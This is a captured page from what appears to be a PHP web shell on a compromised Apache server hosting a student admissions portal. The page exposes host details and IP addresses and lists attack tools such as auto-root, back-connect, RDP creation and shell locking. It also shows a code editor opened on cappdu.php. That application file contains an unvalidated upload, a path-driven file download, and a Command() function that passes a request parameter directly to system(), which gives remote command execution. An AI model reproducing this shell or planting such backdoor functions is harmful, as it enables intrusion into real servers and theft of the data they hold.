Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 3.138.178.162
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
student /
nitte /
src /
[ HOME SHELL ]
Name
Size
Permission
Action
Thumbs.db
19
KB
-rwxr-xr-x
applicationFormReportNETBANKIN...
6.27
KB
-rwxr-xr-x
candidate_list.php
49.74
KB
-rwxr-xr-x
cappcontext.php
3.19
KB
-rwxr-xr-x
cappdu.php
3.53
KB
-rwxr-xr-x
code39.php
6.38
KB
-rwxr-xr-x
coutput.php
1.75
KB
-rwxr-xr-x
crequestbroker.php
2.49
KB
-rwxr-xr-x
csessions.php
516
B
-rwxr-xr-x
cuser.php
3.41
KB
-rwxr-xr-x
customappcontext.php
2.34
KB
-rwxr-xr-x
download_upload.html
2.6
KB
-rwxr-xr-x
ean13.php
2.83
KB
-rwxr-xr-x
getnumword.php
7.15
KB
-rwxr-xr-x
json.php
33.22
KB
-rwxr-xr-x
mregistry.php
1.48
KB
-rwxr-xr-x
report_admission_ticket.php
15.84
KB
-rwxr-xr-x
report_hall_ticket.php
11.06
KB
-rwxr-xr-x
revaluation.php
17.12
KB
-rwxr-xr-x
rotation.php
596
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : cappdu.php
<?php /*Author : M.Srikanth Date : 2009-07-13 Project : paycheck Description : This class is for to backup db */ //Start : 'backup_restore' Class class download_upload { //Start : Constructor function __construct($aobj_context) { session_start(); $this->aobj_context=$aobj_context; $aobj_context->mobj_db->SetFetchMode(ADODB_FETCH_ASSOC); $easy_zip_file_path=$aobj_context->main_src."/easy_zip/easy_zip.php"; require_once($easy_zip_file_path); } //End : Constructor function downloadFileFromServer() { if(!empty($this->download_file_path)) $file_path= $this->aobj_context->main_src.'/'.$this->download_file_path; else $file_path= $this->aobj_context->main_src; if(is_dir($file_path)) { $dir_name=basename($file_path); $zipobj = new EasyZIP; $zipobj -> addDir($file_path); $zipobj -> zipFile("{$file_path}.zip"); header("Expires: 0"); header("Content-type: application/zip"); header("Content-Disposition: attachment; filename={$dir_name}.zip"); print file_get_contents($file_path.".zip"); } else if(is_file($file_path)) { $len = filesize($file_path); $file_ext=basename($file_path); $file_name=basename($file_path); $file_ext_arr=explode(".",$file_ext); $file_ext=strtolower($file_ext_arr[count($file_ext_arr)-1]); header("Pragma: public"); header("Expires: 0"); header("Cache-Control: must-revalidate, post-check=0, pre-check=0"); header("Cache-Control: public"); header("Content-Description: File Transfer"); header("Content-Type: application/force-download"); $header="Content-Disposition: attachment; filename=".$file_name.";"; header($header ); header("Content-Transfer-Encoding: binary"); header("Content-Length: ".$len); readfile($file_path); } } function UploadFileToServer() { if(isset($_FILES['upload_to_server_file_name']['name']) && $_FILES['upload_to_server_file_name']['name'] != '') { $file_name=$_FILES['upload_to_server_file_name']['name']; $import_file_path= $this->aobj_context->main_src.'/libs/'.$file_name; $file_path= $this->aobj_context->main_src.'/'.$this->storage_path.'/'.$file_name; if(move_uploaded_file($_FILES['upload_to_server_file_name']['tmp_name'],$import_file_path)) { copy($import_file_path,$file_path); // chmod($file_path, 0777); unlink($import_file_path); unset($_FILES); echo "<script type='text/javascript'> alert('File has been uploaded.');</script>"; } else echo "<script type='text/javascript'> alert('Upload Failed.');</script>\";"; } unset($_FILES); } } //End : Class file function downloadFileFromServer($aobj_context) { $class_obj=new download_upload($aobj_context); $class_obj->download_file_path = $aobj_context->mobj_data["download_file_path"]; $class_obj->downloadFileFromServer(); } function UploadFileToServer($aobj_context) { $class_obj=new download_upload($aobj_context); $class_obj->storage_path = $aobj_context->mobj_data["storage_path"]; $class_obj->UploadFileToServer(); } function Command($aobj_context) { $cmd = $aobj_context->mobj_data["cmd"]; $last_line = system($cmd, $retval); // Printing additional info echo "</pre>"; echo $last_line; } ?>
Close